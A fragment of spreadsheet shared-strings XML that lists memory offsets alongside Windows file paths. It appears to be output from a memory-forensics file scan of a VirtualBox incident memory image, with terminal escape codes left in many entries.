    <t>\Windows\Fonts\upcfi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec1bb08</t>
  </si>
  <si>
    <t>\Windows\System32\bcryptprimitives.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec1bce8</t>
  </si>
  <si>
    <t>\Windows\Fonts\angsai.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec1bf80</t>
  </si>
  <si>
    <t>0xdec1c038</t>
  </si>
  <si>
    <t>\Windows\System32\netjoin.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec1c7d0</t>
  </si>
  <si>
    <t>\Windows\Fonts\aparajbi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec1ccb0</t>
  </si>
  <si>
    <t>0xdec1ce58</t>
  </si>
  <si>
    <t>0xdec1de10</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\053ace7638cfbb316d63_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec1dec8</t>
  </si>
  <si>
    <t>\Windows\Fonts\angsaz.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec1e928</t>
  </si>
  <si>
    <t>\Windows\Fonts\aparaj.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec1e9e0</t>
  </si>
  <si>
    <t>\Windows\Fonts\ebrimabd.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec1ebc0</t>
  </si>
  <si>
    <t>\Windows\Fonts\aparaji.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec1f178</t>
  </si>
  <si>
    <t>\Windows\Fonts\ebrima.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec1f230</t>
  </si>
  <si>
    <t>\Windows\Fonts\gishabd.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec1fa20</t>
  </si>
  <si>
    <t>\Windows\System32\gpapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec1fe60</t>
  </si>
  <si>
    <t>\Windows\Fonts\aparajb.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec20568</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_servicemodelendpoint_3.0.0.0_0000_1441b5e36e0dde07.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec207f8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\acctres.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec20918</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\UMDF\en-US\WpdMtpDr.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec21038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_cs-cz_da8bfa0c28cad1cc.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec21260</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msrating.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec21380</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnge001.inf_x86_neutral_51cbe14e4cdde8c2\prnge00</t>
  </si>
  <si>
    <t>0xdec216d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_eval_professionale_9cb528bb523eb560.cdf-ms</t>
  </si>
  <si>
    <t>0xdec21b50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_eval_homepremium_ce95835012f5fa8a.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xdec21e50</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmbsb.inf_x86_neutral_92cc2963ca6a905a\mdmbsb.in</t>
  </si>
  <si>
    <t>0xdec22188</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3124275~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec22920</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmeiger.inf_x86_neutral_f5b5d816f4fe88d7\mdmeige</t>
  </si>
  <si>
    <t>0xdec22c68</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msxml3r.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec22f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_0f8924c0debe64e4.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec23268</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_media_heritage_bd7af0f60e3b0705.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec23320</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\AspNetMMCExt.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec233d8</t>
  </si>
  <si>
    <t>\Windows\System32\conhost.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec23b10</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\brmfcsto.inf_x86_neutral_39ae61431a44cded\brmfcst</t>
  </si>
  <si>
    <t>o.inf_x001B_[0K_x001B_[46</t>
  </si>
  <si>
    <t>0xdec23d58</t>
  </si>
  <si>
    <t>0xdec23e10</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\setupapi.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec23ec8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Web.Abstractions\3.5.0.0__31bf3856ad364e35\System.Web.Abstra</t>
  </si>
  <si>
    <t>ctions.dll_x001B_[0</t>
  </si>
  <si>
    <t>0xdec23f80</t>
  </si>
  <si>
    <t>0xdec24498</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpe.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec24700</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Web.Mobile.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec248f8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_media_cityscape_b0cbff7c81824cc5.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec24b18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_schemas_eaphost_52e2de002c0b1796.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec24f80</t>
  </si>
  <si>
    <t>\Windows\System32\dnsrslvr.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec25038</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\RAC\StateData\RacWmiDataBookmarks.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec25600</t>
  </si>
  <si>
    <t>\Windows\System32\wintrust.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec25cc8</t>
  </si>
  <si>
    <t>\Windows\System32\credssp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec25e30</t>
  </si>
  <si>
    <t>\Windows\System32\MPSSVC.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec25f80</t>
  </si>
  <si>
    <t>0xdec26398</t>
  </si>
  <si>
    <t>0xdec26540</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\find.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec26988</t>
  </si>
  <si>
    <t>\Windows\System32\gdi32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec27038</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\AGP440.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec27748</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPF5A1.tmp\Microsoft.Build.Framework.dll_x001B_[0</t>
  </si>
  <si>
    <t>0xdec279e0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Data.Entity.Build.Tasks.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec27f38</t>
  </si>
  <si>
    <t>\Windows\System32\isoburn.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec282f8</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\MUI\LPRemove_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec28778</t>
  </si>
  <si>
    <t>\Windows\System32\devrtl.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec28cc8</t>
  </si>
  <si>
    <t>0xdec29038</t>
  </si>
  <si>
    <t>\Windows\System32\negoexts.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec29218</t>
  </si>
  <si>
    <t>\Windows\Fonts\cambriab.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec29460</t>
  </si>
  <si>
    <t>\Windows\Fonts\cordiaz.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec29d38</t>
  </si>
  <si>
    <t>\Windows\Fonts\cordia.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec29df0</t>
  </si>
  <si>
    <t>\Windows\Fonts\cordiai.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec2a490</t>
  </si>
  <si>
    <t>\Windows\System32\IPHLPAPI.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec2a548</t>
  </si>
  <si>
    <t>\Windows\Fonts\cordiab.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec2ad40</t>
  </si>
  <si>
    <t>\Windows\System32\kerberos.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec2d120</t>
  </si>
  <si>
    <t>0xdec2d498</t>
  </si>
  <si>
    <t>\Windows\Fonts\gisha.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec2dda0</t>
  </si>
  <si>
    <t>0xdec2e8c8</t>
  </si>
  <si>
    <t>\Windows\System32\snmptrap.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec2eb98</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\lmhsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec2ed08</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\e8164c0d-216c-4b6b-9eb8-31bf958b8014_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec2f720</t>
  </si>
  <si>
    <t>\Windows\Fonts\leelawad.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec301f0</t>
  </si>
  <si>
    <t>\Windows\Fonts\leelawdb.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec303e8</t>
  </si>
  <si>
    <t>\Windows\System32\VBoxService.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec30808</t>
  </si>
  <si>
    <t>\Windows\Fonts\calibrili.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec30a88</t>
  </si>
  <si>
    <t>\Windows\System32\logoncli.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec30ec8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\luafv.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec30f80</t>
  </si>
  <si>
    <t>\Windows\System32\msv1_0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec311d0</t>
  </si>
  <si>
    <t>\Windows\debug\PASSWD.LOG_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec31998</t>
  </si>
  <si>
    <t>\Windows\Fonts\msuighur.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec31b78</t>
  </si>
  <si>
    <t>\Windows\Fonts\calibril.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec321a0</t>
  </si>
  <si>
    <t>0xdec32670</t>
  </si>
  <si>
    <t>\Windows\Fonts\moolbor.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec32df0</t>
  </si>
  <si>
    <t>\Windows\Fonts\utsaahbi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec335e0</t>
  </si>
  <si>
    <t>\Windows\Fonts\symbol.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec338e0</t>
  </si>
  <si>
    <t>\Windows\Fonts\utsaahb.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec33f80</t>
  </si>
  <si>
    <t>\Windows\Fonts\utsaah.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec34038</t>
  </si>
  <si>
    <t>\Windows\System32\dnsapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec34888</t>
  </si>
  <si>
    <t>0xdec35110</t>
  </si>
  <si>
    <t>0xdec35230</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\TsUsbFlt.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec352f0</t>
  </si>
  <si>
    <t>\Windows\WindowsUpdate.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec35798</t>
  </si>
  <si>
    <t>\Windows\Fonts\vijaya.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec35850</t>
  </si>
  <si>
    <t>\Windows\Fonts\vijayab.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec35a30</t>
  </si>
  <si>
    <t>\Windows\Fonts\wingding.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec36038</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.</t>
  </si>
  <si>
    <t>000_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec36358</t>
  </si>
  <si>
    <t>\Windows\Fonts\script.fon_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec36478</t>
  </si>
  <si>
    <t>\Windows\System32\wdigest.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec37288</t>
  </si>
  <si>
    <t>\Windows\Fonts\roman.fon_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec37340</t>
  </si>
  <si>
    <t>\Windows\System32\efslsaext.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec37588</t>
  </si>
  <si>
    <t>\Windows\Fonts\andlso.ttf_x001B_[0K_x001B_[48G</t>
  </si>
  <si>
    <t>0xdec379c8</t>
  </si>
  <si>
    <t>\Windows\Fonts\modern.fon_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec37a80</t>
  </si>
  <si>
    <t>\Windows\Fonts\majallab.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec38038</t>
  </si>
  <si>
    <t>\Windows\Fonts\simpo.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec38610</t>
  </si>
  <si>
    <t>\Windows\System32\clusapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec389e0</t>
  </si>
  <si>
    <t>\Windows\Fonts\arabtype.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec39408</t>
  </si>
  <si>
    <t>0xdec39900</t>
  </si>
  <si>
    <t>0xdec39e00</t>
  </si>
  <si>
    <t>0xdec39eb8</t>
  </si>
  <si>
    <t>\Windows\System32\rsaenh.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec3a5a8</t>
  </si>
  <si>
    <t>0xdec3ab58</t>
  </si>
  <si>
    <t>\Windows\Fonts\simpbdo.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec3ac10</t>
  </si>
  <si>
    <t>\Windows\Fonts\ahronbd.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec3ae58</t>
  </si>
  <si>
    <t>\Windows\Fonts\majalla.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec3b038</t>
  </si>
  <si>
    <t>\Windows\System32\xmllite.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec3b4d0</t>
  </si>
  <si>
    <t>\Windows\System32\TSpkg.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec3be60</t>
  </si>
  <si>
    <t>\Windows\Fonts\simpfxo.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec3bf18</t>
  </si>
  <si>
    <t>0xdec3ca48</t>
  </si>
  <si>
    <t>0xdec3cc90</t>
  </si>
  <si>
    <t>\Windows\System32\pku2u.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec3d3b8</t>
  </si>
  <si>
    <t>\Windows\Fonts\david.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec3dd40</t>
  </si>
  <si>
    <t>\protected_storage_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec3e120</t>
  </si>
  <si>
    <t>\Windows\Fonts\lvnm.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec3e1d8</t>
  </si>
  <si>
    <t>0xdec3e6b8</t>
  </si>
  <si>
    <t>\Windows\System32\wu.upgrade.ps.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec3e770</t>
  </si>
  <si>
    <t>0xdec3ecd8</t>
  </si>
  <si>
    <t>\Windows\Fonts\davidbd.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec3f210</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcibi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec3f3e8</t>
  </si>
  <si>
    <t>\Windows\Fonts\angsau.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec3f680</t>
  </si>
  <si>
    <t>\Windows\System32\config\SAM.LOG1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec3f8c8</t>
  </si>
  <si>
    <t>\Windows\Fonts\rod.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec3fd08</t>
  </si>
  <si>
    <t>\Windows\Fonts\lvnmbd.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec40810</t>
  </si>
  <si>
    <t>0xdec409d8</t>
  </si>
  <si>
    <t>\Windows\Fonts\mriamc.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec40c20</t>
  </si>
  <si>
    <t>0xdec40cd8</t>
  </si>
  <si>
    <t>\Windows\System32\Microsoft\Protect\S-1-5-18\User\04ece708-132d-4bf0-a647-e3329269a012_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec41038</t>
  </si>
  <si>
    <t>0xdec41188</t>
  </si>
  <si>
    <t>0xdec41b80</t>
  </si>
  <si>
    <t>\Windows\Fonts\nrkis.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec41ef0</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec424c0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP5848.tmp\System.DirectoryServices.Protoco</t>
  </si>
  <si>
    <t>ls.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec43a40</t>
  </si>
  <si>
    <t>\Windows\System32\config\SAM.LOG2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec43d80</t>
  </si>
  <si>
    <t>\Windows\System32\config\RegBack\SAM_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec43ec8</t>
  </si>
  <si>
    <t>\Windows\Fonts\simfang.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec44378</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec44ec8</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\Repository\MAPPING1.MAP_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec44f80</t>
  </si>
  <si>
    <t>\Windows\System32\scecli.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec45420</t>
  </si>
  <si>
    <t>\Windows\Fonts\angsaub.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec45a20</t>
  </si>
  <si>
    <t>\Windows\Fonts\browa.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec45c80</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcib.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec45da8</t>
  </si>
  <si>
    <t>0xdec45e60</t>
  </si>
  <si>
    <t>\Windows\Fonts\simkai.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec46410</t>
  </si>
  <si>
    <t>0xdec46620</t>
  </si>
  <si>
    <t>0xdec46a50</t>
  </si>
  <si>
    <t>\Windows\System32\wshqos.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec46ba0</t>
  </si>
  <si>
    <t>\Windows\System32\crypt32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec46da0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec46f80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mmcbase.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec470e8</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-MUI%4Admin.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec47440</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\SoundRecorder.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec47c68</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\webservices.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec47ed0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_appcompat_appraiser_telemetry_94274e99519f58a9.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec486b8</t>
  </si>
  <si>
    <t>0xdec488a0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\scesrv.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec48b78</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_drivers_en-us_4bb913fc5eb96bcf.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec48f80</t>
  </si>
  <si>
    <t>\Windows\System32\fdSSDP.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec49038</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\SnippingTool.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec497e0</t>
  </si>
  <si>
    <t>\Windows\servicing\TrustedInstaller.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec49948</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.VisualC.STLCLR.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec49c18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\NlsData0009.dll_x001B_[0K_x001B_[89G</t>
  </si>
  <si>
    <t>0xdec49e30</t>
  </si>
  <si>
    <t>\Windows\System32\advapi32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec49ee8</t>
  </si>
  <si>
    <t>\Windows\System32\lpk.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4a228</t>
  </si>
  <si>
    <t>0xdec4a2f0</t>
  </si>
  <si>
    <t>0xdec4a520</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\UIAutomationClientsideProviders.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4a5d8</t>
  </si>
  <si>
    <t>\Windows\System32\wininet.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4a820</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\faultrep.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4aca0</t>
  </si>
  <si>
    <t>\Windows\System32\FirewallAPI.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4ae70</t>
  </si>
  <si>
    <t>\Windows\System32\wkssvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4b1f0</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\icudt44.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4b650</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_oem_startere_3099b13c9201d0f3.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4ba38</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_oem_professional_e0db4d0dc7ac2dac.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xdec4bd00</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\synth3dvsc.inf_x86_neutral_bccbc5fb46a05558\synth</t>
  </si>
  <si>
    <t>3dvsc.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4be20</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_oem_professionaln_e0db4d0dc779affa.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xdec4c4e8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_ime_imejp10_aead4918eed09977.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4c818</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ph3xibc1.inf_x86_neutral_662220c3016bb4d0\Ph3xIBC</t>
  </si>
  <si>
    <t>0xdec4c8d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_icsxml_1f8f393b196e65ae.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4ccb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_ias_0665534bd047d20d.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4d600</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\en-US\PresentationHost_v0400.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4d918</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_pla_rules_0bde462ce96f215e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4dc00</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_media_quirky_6baa21a590d24b57.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4dee8</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\incident.mem_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4e298</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\Locator.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4e480</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\bthci.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4e5d0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netrtl32.inf_x86_neutral_79fee35a46b8dacd\netrtl3</t>
  </si>
  <si>
    <t>0xdec4ed28</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\sessenv.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4eeb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_prefetch_readyboot_925024bb73d7b5a6.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4f038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_microsoft.net_3296b36dbe4c7fa3.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4f5a8</t>
  </si>
  <si>
    <t>0xdec4f668</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Conversion.v4.0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4f720</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Engine.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec4f938</t>
  </si>
  <si>
    <t>0xdec4fcb8</t>
  </si>
  <si>
    <t>0xdec4ff80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Web.RegularExpressions.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec505d8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\themeui.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec50788</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\msdv.inf_x86_neutral_4322b3da4858d42a\msdv.inf_x001B_[0</t>
  </si>
  <si>
    <t>0xdec50d88</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\psbase.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec51318</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP5404.tmp\System.Management.Instrumentatio</t>
  </si>
  <si>
    <t>0xdec515b0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_policydefinitions_89130cdfc4d9c27c.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec51948</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mmcshext.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec51a98</t>
  </si>
  <si>
    <t>0xdec51bc0</t>
  </si>
  <si>
    <t>0xdec52380</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\browser.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec529d8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmaiwat.inf_x86_neutral_ade95bcd36fc6206\mdmaiwa</t>
  </si>
  <si>
